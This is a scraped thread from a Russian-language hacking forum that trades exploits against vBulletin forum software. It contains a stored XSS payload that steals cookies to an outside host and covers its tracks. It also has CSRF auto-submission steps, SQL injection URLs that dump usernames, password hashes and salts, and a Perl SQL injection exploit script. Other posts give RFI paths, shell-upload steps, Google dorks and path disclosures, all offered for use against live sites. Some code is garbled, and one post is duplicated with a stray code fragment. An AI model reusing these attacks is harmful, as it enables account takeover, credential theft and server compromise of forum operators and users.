![]() |
Opinion System 1.5.0 Имеется пассивноактивная? xss... после того, как оставили мнение с js при каждом переходе на страницу с мнением будет выполняться этот код, так как он подгружается в строку редактирования. У других отображен не будет. фильтр спец символов. Для использования достаточно сформировать запрос на добавление мнения и редиректнуть его на страничку с мнениями... для отвода глаз Дорк Цитата:
|
Цитата:
Приведу пример практической эксплуатации бага: 1. Добавление мнения POST-запрос opinion.php do=postvote&postid=[POSTID]&comment=[COMMENT]&value=0 Защита от CSRF - проверка домена рефера. Если в заголовке вообще нет рефера, запрос тоже срабатывает. a) [POSTID] opinion.php?do=about&userid=[USERID] Цитата:
Кто именно это будет, не имеет значения ([USERID] - любой существующий пользователь) b) Автоматическая отправка запроса PHP код:
2. Отображение мнения на странице opinion.php?do=about&userid=[USERID] Цитата:
Цитата:
На странице мнений для удаления есть встроенная JS-функция, она и будет использована для уничтожения следов атаки. После вызова функции удаления страница очищается, чтобы избежать зацикливания onfocus. PHP код:
a) убираем все лишнее Цитата:
Код:
Zz0naHR0cDovL2V4YW1wbGUuY29tLz9jb29raWU9JztiPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF07Yi5pbm5lckhUTUwrPSc8aW1nIHNyYz0iJytnK2VzY2FwZShkb2N1bWVudC5jb29raWUpKycib25lcnJvcj0iJysvQ2hhbmdlVGV4dFwoJ2RvPWRlbGV0ZS4rP1wpLy5leGVjKGIuaW5uZXJIVE1MKSsnO2RvY3VtZW50LndyaXRlKFwnXCcpIj4nOy8vКод:
http://tinyurl.com/c6opgykPHP код:
Цитата:
PHP код:
[POSTID] действует относительно недолго, поэтому все вышеописанное будет работать только для одной атаки на конкретного пользователя. Чтобы полностью все автоматизировать, придется парсить http://site/opinion.php?do=about&userid=[USERID] и динамически генерировать код из пункта 5 на своем сервере, например PHP-скриптом. PHP код:
Заставить все это работать кроссбраузерно - задача тоже относительно непростая. Описывать специфику работы различных браузеров с data и другие варианты скрытия реферера здесь не буду, потому что получится слишком много инфы для одного оффтопного сообщения. |
Цитата:
|
Обычно (90%) в нижнем углу написано "Администрирование".
Клацните туда и попадете в админку. |
Цитата:
Цитата:
|
Цитата:
|
зайдите под админом, дождитесь админа и посмотрите пути админки через "кто на сайте"
|
vBulletin 4.1.10 Full Path Disclosure
[Info] # Author: linc0ln.dll # Exploit Title: vBulletin 4.1.10 Full Path Disclosure # Date: 16/01/2012 # Vendor or Software Link: http://www.vbulletin.com/# Category: WebApp # Version: 4.1.10 # Contact: linc@tormail.net # Website: linc6.wordpress.com # Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |VoltroN | amiugly | b00y4k4 | [Vulnerability] # Full Path Disclosure: Цитата:
Цитата:
Цитата:
Цитата:
|
Цитата:
|
АктивнаяXSS
Уязвимы все версий Требуются права модератора Идём Панель модератора -> Управление разделами -> Объявление [Редактировать] Рабочий пример (проверка на работоспособность) Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
vBulletin 4.1.7 => 4.1.10 XSS Vulnerability
Vulnerability: 1. Send New Private Message > > Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8) Watch the video: [http://vimeo.com/39049790] 1337day.com/exploits/17824 |
Цитата:
|
Да нет вопросов
Поехали EasyPage SQL-Injection Google Dork: intext:"vbulletin" inurl:"page.php?p=" [Result: 18 000] File: /page.php PHP код:
PHP код:
PHP код:
PHP код:
PHP код:
PHP код:
(c) Boolean, 0x0000ed.com, 2012. Было успешно взято (с) Grabberz.com |
vBulletin 3.8.x
Цитата:
PHP код:
Цитата:
|
Раскрытие путей в последней версии(4.2.0)
Нужны как минимум права модера. Код:
http://localhost/modcp/index.php?do[]=head |
Заливка шелла в 4.0.7 плюс\минус
Требуется доступ в админку. Код HTML:
Заходим в админку |
Цитата:
Цитата:
PHP код:
|
vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability
# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability # Google Dork: No Dork # Date: 19/10/2012 # Exploit Author: Juno_okyo # Vendor Homepage: http://hoiquantinhoc.com # Software Link: http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html # Version: vBulletin 3 & 4 # Tested on: Windows 7 # CVE : http://www.vbulletin.com/ # ################################################## ############################################ Vulnerability: ################################################## ############################################ SQL Injection was found in ChangUonDyU Advanced Statistics. Query on ajax.php ################################################## ############################################ Exploitation: ################################################## ############################################ ajax.php?do=inforum&listforumid=100) UNION SELECT 1,concat_ws(0x7c,user(),database(),version()),3,4, 5,6,7,8,9,10-- -&result=20 or: ajax.php?do=inforum&listforumid=100) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,username,password,salt) ,8,9,10,11 from user where userid=1-- -&result=20 ################################################## ############################################ Ex: ################################################## ############################################ http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20S ELECT%201,concat_ws%280x7c,user%28%29,database%28% 29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20 ################################################## ############################################ More Details: ################################################## ############################################ Website: http://junookyo.blogspot.com/ About Exploit: http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html ################################################## ############################################ Great thanks to James, Juno_okyo & J2TeaM, VNHack Group ################################################## ############################################ |
vBulletin 4.2.0 Full Path Disclosure Vulnerability
Код:
The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username. Код:
/includes/api/commonwhitelist_2.php |
Цитата:
|
Цитата:
[PHP] [COLOR="#000000"]#!/usr/bin/env perl useLWP::UserAgent; sub banner{ print"###################################\n"; print"############ DSecurity ############\n"; print"###################################\n"; print"# Email:dsecurity.vn[at]gmail.com #\n"; print"###################################\n"; } if(@ARGVnew(); $ua->agent("DSecurity"); $ua->cookie_jar({}); sub login(@){ my $username=shift; my $password=shift; my $req=HTTP::Request->new(POST=>$ARGV[0].'/login.php?do=login'); $req->content_type('application/x-www-form-urlencoded'); $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login& vb_login_md5password=&vb_login_md5password_utf="); my $res=$ua->request($req); } sub v_request{ #Declare $print=$_[0]; $select=$_[1]; $from=$_[2]; $where=$_[3]; $limit=$_[4]; $sleep=$ARGV[4]; if ($from eq'') {$from='information_schema.tables';} if ($where eq'') {$where='1';} if ($limit eq'') {$limit='0';} if ($sleep eq'') {$sleep='10';} # Create a request my $req=HTTP::Request->new(POST=>$ARGV[0].'/eggavatar.php'); $req->content_type('application/x-www-form-urlencoded'); $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar =1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT( (select$selectfrom$fromWHERE$wherelimit$limit,1),FLOOR(RAND(1)*3))foo FROM information_schema .tables GROUP BY foo)a)-- -'&uid=1&pid=1"); # Pass request to the user agent and get a response back my $res=$ua->request($req); #print $res->content; if($res->content=~ /(MySQL Error)(.*?)'(.*?)0'(.*)/) {$test= $3}; sleep($sleep); return$print.$test."\n"; } &banner; print"\n############################################### # ############################################# ##### ###########\n"; print"# EggAvatar for vBulletin 3.8.x SQL Injecti on Vulnerability #\n"; print"# Date:06-03-2011 #\n"; print"# Author: DSecurity #\n"; print"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n"; print"# Version: 2.3.2 #\n"; print"# Tested on: vBulletin 3.8.0 #\n"; print"################################################# # ############################################# ##### #########\n"; #login login($ARGV[1],$ARGV[2]); #Foot print printv_request('MySQL version: ','@@version'); printv_request('Data dir: ','@@datadir'); printv_request('User: ','user()'); printv_request('Database: ','database()'); #Get user for($i=1;$i[COLOR="#007700"] |
Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion
Кто-то пробовал? Все облазил-нашел только следующее # Exploit : # # http://www.site.com/path/includes/class_block.php?classfile=[shell code] # # http://www.site.com/path/vb/vb.php?filename=[shell code] # # http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code] Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк??? |
Недавно искал новый сплоит под vBulletin.
Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея: Код:
http://1337day.com/exploit/description/20417Цитата:
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп: Код:
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш. Пробручиваю хэш получаю 12 значное число. Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом. http://i068.radikal.ru/1302/bc/3b6adca7e7cc.jpg После установки ни один из проверенных форумов не предложил сменить пароль. Вернулся к описанию, "Access to Admincp and Customer area". Легче от этого не стало: Цитата:
[/QUOTE] " if author else f" Цитата:
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп: Код:
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш. Пробручиваю хэш получаю 12 значное число. Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом. http://i068.radikal.ru/1302/bc/3b6adca7e7cc.jpg После установки ни один из проверенных форумов не предложил сменить пароль. Вернулся к описанию, "Access to Admincp and Customer area". Легче от этого не стало: Цитата:
[/QUOTE] |
Эксплоит оказался не рабочим, но что-то делать было нужно.
Мой вгляд пал на только что обновленную булку до версии: 4.1.5 Код:
mmoru.comПроверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5. Название: Уязвимость в vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments) Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос. Пример: PHP код:
PHP код:
|
vBulletin 5 Beta XX SQLi 0day
Код:
#!/usr/bin/perl |
vBulletin® Version 4.1.5
http://www.youtube.com/watch?v=k9xe55gq2fc |
Обход ограничений безопасности в vBulletin
Дата публикации: 10.10.2013 Дата изменения: 10.10.2013 Всего просмотров: 1104 Опасность: Высокая Наличие исправления: Инстуркции по устранению Количество уязвимостей: 1 CVSSv2 рейтинг: (AV:N/AC:L/Au:N/C/I/A/E:H/RL:W/RC:C) = Base:7.5/Temporal:7.1 CVE ID: Нет данных Вектор эксплуатации: Удаленная Воздействие: Обход ограничений безопасности CWE ID: Нет данных Наличие эксплоита: Активная эксплуатация уязвимости Уязвимые продукты: vBulletin 4.x vBulletin 5.x Уязвимые версии: vBulletin версии 4.x, 5.x Описание: Уязвимость позволяет удаленному пользователю получить административный доступ к приложению. Уязвимость существует из-за неизвестной ошибки в сценарии /install/upgrade.php. Удаленный пользователь может с помощью специально сформированного запроса создать новую административную учетную запись и получить полный контроль над приложением. Уязвимость активно эксплуатируется в настоящее время. URL производителя: http://www.vbulletin.com/ Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временно решения производитель рекомендует удалить установочные директории /install/ или /core/install/. Ссылки: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5 http://www.vbulletin.org/forum/showthread.php?p=2443431 где взять POC? |
Цитата:
более подробно тут |
Цитата:
|
Небольшая заметка о "быстром" поиске админки.
В случае, когда у Вас есть администраторский аккаунт, но нет доступа в админку, по причине "админ захотел поиграть в кошки-мышки и переименовал админку", дабы не брутить и не нагружать сервер кучей бесполезных логов, поможет следующий способ: заходим в профиль любого пользователя (forum/member.php?u=2), видим кнопку "Edit Profile / Редактировать учётную запись". По ссылке - как раз адрес админки. VB >= 2.8.6 Другие версии не проверял. |
Цитата:
Если она не прописана в конфиге то не найти. |
Залили другу через шелл такую штукуVbulletin activity Page Denial of Service,
сам не проверял кому то может пригодится Цитата:
|
|
vBulletin 5 PreAuth RCE writeup
Цитата:
|
Кто-нибудь знает уязвимости в VB 3.8.7 / 4.2.x?
|
Цитата:
|
https://github.com/rezasp/vbscan
обновился Цитата:
|
| Время: 21:44 |